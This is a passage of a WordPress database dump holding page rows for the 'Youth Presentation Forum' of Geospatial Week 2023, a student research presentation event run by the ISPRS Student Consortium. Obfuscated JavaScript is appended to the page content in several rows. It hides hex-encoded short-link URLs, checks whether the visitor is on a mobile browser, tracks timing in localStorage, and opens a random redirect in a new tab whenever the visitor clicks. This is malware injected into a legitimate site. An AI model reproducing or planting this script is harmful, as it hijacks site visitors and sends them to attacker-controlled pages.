_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','publish','closed','closed','','youth-presentation-forum','','','2023-02-05 14:47:39','2023-02-05 14:47:39','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=3613',0,'dt_portfolio','',0),
(3614,1,'2023-01-22 04:30:18','2023-01-22 04:30:18','','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:30:18','2023-01-22 04:30:18','',3613,'https://gsw2023.com/?p=3614',0,'revision','',0),
(3615,1,'2023-01-22 04:37:02','2023-01-22 04:37:02','','youthm2','','inherit','open','closed','','youthm2','','','2023-01-22 04:37:02','2023-01-22 04:37:02','',3613,'https://gsw2023.com/wp-content/uploads/2023/01/youthm2.jpg',0,'attachment','image/jpeg',0),
(3616,1,'2023-01-22 04:40:57','2023-01-22 04:40:57','','Youth Presentation Forum','','inherit','closed','closed','','3613-autosave-v1','','','2023-01-22 04:40:57','2023-01-22 04:40:57','',3613,'https://gsw2023.com/?p=3616',0,'revision','',0),
(3617,1,'2023-01-22 04:43:01','2023-01-22 04:43:01','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:43:01','2023-01-22 04:43:01','',3613,'https://gsw2023.com/?p=3617',0,'revision','',0),
(3618,1,'2023-01-22 04:44:08','2023-01-22 04:44:08','','youthm1','','inherit','open','closed','','youthm1','','','2023-01-22 04:44:08','2023-01-22 04:44:08','',3613,'https://gsw2023.com/wp-content/uploads/2023/01/youthm1.jpg',0,'attachment','image/jpeg',0),
(3619,1,'2023-01-22 04:44:38','2023-01-22 04:44:38','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 